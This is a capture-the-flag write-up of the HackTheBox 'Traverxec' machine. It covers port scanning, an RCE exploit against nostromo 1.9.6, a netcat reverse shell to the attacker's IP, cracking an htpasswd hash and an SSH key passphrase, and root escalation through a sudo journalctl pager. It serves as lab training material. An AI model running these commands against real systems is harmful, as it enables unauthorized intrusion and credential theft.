Nmap
Exploitation
Post exploitation
Privilege escalation: www-data to david
Enumeration
Linpeas
Privilege escalation: david to root
Enumeration
Linpeas
Welcome to the Traverxec writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Traverxec
tags: HTB
Easy
Linux
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 10.10.10.165
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 18:27 CEST
Nmap scan report for 10.10.10.165
Host is up (0.087s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 99.28 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80 10.10.10.165
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 18:29 CEST
Nmap scan report for 10.10.10.165
Host is up (0.087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 5.1 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 86.43 ms 10.10.14.1
2 86.46 ms 10.10.10.165
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.49 seconds
The Nmap
scanner shows us that an installation of nostromo 1.9.6
is running on port 80.
If we search the internet for vulnerabilities for this version of software we can easily find an exploit to obtain RCE. Link to exploit
Exploitation
Ok, let's test if the exploit works.
$ python rce.py 10.10.10.165 80 id
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
HTTP/1.1 200 OK
Date: Wed, 21 Jul 2021 17:00:59 GMT
Server: nostromo 1.9.6
Connection: close
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Works! let's get a shell. We need to put a terminal to listen and launch a reverse shell.
$ python rce.py 10.10.10.165 80 "nc 10.10.14.29 8787 -e /bin/bash"
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.165] 35458
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Post exploitation
Privilege escalation: www-data to david
Enumeration
Linpeas
[...]
[+] Environment
[i] Any private information inside environment variables?
GATEWAY_INTERFACE=CGI/1.1
HISTFILESIZE=0
SHLVL=2
REMOTE_ADDR=10.10.14.29
DOCUMENT_ROOT=/var/nostromo/htdocs
[...]
[...]
[+] Iptables rules
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -m tcp -m state --state NEW -m recent --set --name SSH --mask 255.255.255.255 --rsource
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -m tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 10 --name SSH --mask 255.255.255.255 --rsource -j REJECT --reject-with icmp-port-unreachable
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 80 -m tcp -m state --state NEW -m recent --set --name HTTP --mask 255.255.255.255 --rsource
-A INPUT -i eth0 -p tcp -m tcp --dport 80 -m tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 40 --name HTTP --mask 255.255.255.255 --rsource -j REJECT --reject-with icmp-port-unreachable
-A INPUT -i eth0 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p icmp -j ACCEPT
COMMIT
[...]
As we can see, nostromo
is installed in /var/nostromo/htdocs
. Let's see its configuration files.
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
Perfect, inside the /var/nostromo/conf/.htpasswd
file we find the hash for the user david
.
www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
We can crack the hash using John the ripper
.
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
1g 0:00:00:48 DONE (2021-07-21 19:10) 0.02076g/s 219697p/s 219697c/s 219697C/s NuiMeanPoon..Nous4=5
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password for david
is Nowonly4me
but it does not work neither by SSH nor by su.
Reading the nostromo documentation we can find references to the homedirs
parameter of the nhttpd.conf
file.
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
And it works! we can access to david's home using this url http://traverxec.htb/~david/
Knowing this and seeing that inside the homedirs
directory there is a directory called public_www
, let's see if we have access to it.
www-data@traverxec:/var/nostromo/conf$ ls /home/david/public_www
index.html protected-file-area
www-data@traverxec:/var/nostromo/conf$ ls /home/david/public_www/protected-file-area/
backup-ssh-identity-files.tgz
We can access it and find a compressed file with SSH keys.
www-data@traverxec:/home/david/public_www/protected-file-area$ cp backup-ssh-identity-files.tgz /tmp
www-data@traverxec:/home/david/public_www/protected-file-area$ cd /tmp
www-data@traverxec:/tmp$ tar zxvf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/tmp$
Ok, Let's connect via SSH using the id_rsa
key obtained!.
$ ssh david@traverxec.htb -i david_traverxec
load pubkey "david_traverxec": invalid format
Enter passphrase for key 'david_traverxec':
It has passphrase and Nowonly4me
doesn't work. Let's crack it.
$ ssh2john david_traverxec > hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (david_traverxec)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:03 DONE (2021-07-21 19:49) 0.3021g/s 4332Kp/s 4332Kc/s 4332KC/sa6_123..*7¡Vamos!
Session completed
And now yes! we are david
using the hunter
passphrase and we can read the user flag.
$ ssh david@traverxec.htb -i david_traverxec
load pubkey "david_traverxec": invalid format
Enter passphrase for key 'david_traverxec':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
CENSORED_FLAG
Privilege escalation: david to root
Enumeration
Linpeas
Inside the $PATH
variable, the /home/david/bin
path is assigned.
[+] PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/home/david/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
New path exported: /home/david/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/sbin:/usr/sbin:/sbin
And inside this path we can find the server-stats.sh
script with this content.
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
As we can see the script is running journalctl
as root
using sudo
.
Looking at the GTFOBins list, we can see that it allows us to escalate privileges.
To achieve this we need to make our terminal small
In this point:
We just have to write !/bin/bash
and hit the intro
key.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2021-07-23 12:25:44 EDT, end at Fri 2021-07-23 13:24:01 EDT
Jul 23 12:25:46 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 23 12:25:46 traverxec systemd[1]: nostromo.service: Failed to parse PID from
Jul 23 12:25:46 traverxec nhttpd[422]: started
Jul 23 12:25:46 traverxec nhttpd[422]: max. file descriptors = 1040 (cur) / 1040
Jul 23 12:25:46 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# cat /root/root.txt
CENSORED_FLAG